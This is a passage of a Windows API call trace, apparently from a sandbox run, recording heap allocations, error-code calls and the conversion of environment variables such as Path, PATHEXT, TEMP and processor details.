SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e12b8) returned 0x2c [0149.883] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e12b8, Size=0x30) returned 0x2e12b8 [0149.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0149.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e12f0 [0149.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2e12f0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e12b8) returned 0x30 [0149.885] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e12b8, Size=0x34) returned 0x2e1310 [0149.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0149.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e12b8 [0149.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x2e12b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.885] SetLastError (dwErrCode=0x0) [0149.885] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.886] GetLastError () returned 0x0 [0149.886] SetLastError (dwErrCode=0x0) [0149.887] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1310) returned 0x34 [0149.887] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1310, Size=0x38) returned 0x2e1310 [0149.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0149.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe) returned 0x2de6d0 [0149.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x2de6d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.887] SetLastError (dwErrCode=0x0) [0149.887] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.888] GetLastError () returned 0x0 [0149.888] SetLastError (dwErrCode=0x0) [0149.889] GetLastError () returned 0x0 [0149.889] SetLastError (dwErrCode=0x0) [0149.889] GetLastError () returned 0x0 [0149.889] SetLastError (dwErrCode=0x0) [0149.889] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1310) returned 0x38 [0149.889] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1310, Size=0x3c) returned 0x2e1310 [0149.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0149.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x69) returned 0x2e1358 [0149.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x2e1358, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0149.889] GetLastError () returned 0x0 [0149.889] SetLastError (dwErrCode=0x0) [0149.889] GetLastError () returned 0x0 [0149.889] SetLastError (dwErrCode=0x0) [0149.889] GetLastError () returned 0x0 [0149.889] SetLastError (dwErrCode=0x0) [0149.889] GetLastError () returned 0x0 [0149.889] SetLastError (dwErrCode=0x0) [0149.889] GetLastError () returned 0x0 [0149.889] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1310) returned 0x3c [0149.889] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1310, Size=0x40) returned 0x2e1310 [0149.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0149.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3e) returned 0x2d5060 [0149.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x2d5060, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0149.889] GetLastError () returned 0x0 [0149.889] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1310) returned 0x40 [0149.889] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1310, Size=0x44) returned 0x2e13d0 [0149.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0149.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1b) returned 0x2def88 [0149.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x2def88, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0149.889] GetLastError () returned 0x0 [0149.890] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x44 [0149.890] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x48) returned 0x2e13d0 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0149.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1d) returned 0x2defb0 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x2defb0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0149.890] GetLastError () returned 0x0 [0149.890] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x48 [0149.890] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x4c) returned 0x2e13d0 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0149.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d6bf0 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x2d6bf0, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0149.890] GetLastError () returned 0x0 [0149.890] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x4c [0149.890] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x50) returned 0x2e13d0 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0149.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12) returned 0x2e1310 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x2e1310, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0149.890] GetLastError () returned 0x0 [0149.890] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x50 [0149.890] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x54) returned 0x2e13d0 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0149.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e1330 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x2e1330, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0149.890] GetLastError () returned 0x0 [0149.890] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x54 [0149.890] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x58) returned 0x2e13d0 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0149.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1b) returned 0x2defd8 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2defd8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0149.890] GetLastError () returned 0x0 [0149.890] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x58 [0149.890] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x5c) returned 0x2e13d0 [0149.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0149.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2daa80 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2daa80, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0149.891] GetLastError () returned 0x0 [0149.891] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x5c [0149.891] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x60) returned 0x2e13d0 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0149.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x29) returned 0x2db190 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2db190, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0149.891] GetLastError () returned 0x0 [0149.891] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x60 [0149.891] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x64) returned 0x2e13d0 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0149.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2df000 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x2df000, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0149.891] GetLastError () returned 0x0 [0149.891] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x64 [0149.891] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x68) returned 0x2e13d0 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0149.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x41) returned 0x2d6c40 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x2d6c40, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0149.891] GetLastError () returned 0x0 [0149.891] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x68 [0149.891] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x6c) returned 0x2e13d0 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0149.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e1448 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x2e1448, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0149.891] GetLastError () returned 0x0 [0149.891] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x6c [0149.891] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x70) returned 0x2e13d0 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0149.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf) returned 0x2de6e8 [0149.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x2de6e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0149.891] GetLastError () returned 0x0 [0149.892] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13d0) returned 0x70 [0149.892] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13d0, Size=0x74) returned 0x2e1468 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0149.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x16) returned 0x2e13d0 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2e13d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0149.892] GetLastError () returned 0x0 [0149.892] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1468) returned 0x74 [0149.892] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1468, Size=0x78) returned 0x2e1468 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0149.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db1c8 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2db1c8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0149.892] GetLastError () returned 0x0 [0149.892] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1468) returned 0x78 [0149.892] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1468, Size=0x7c) returned 0x2e1468 [0149.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0149.892] RtlAllocateHeap 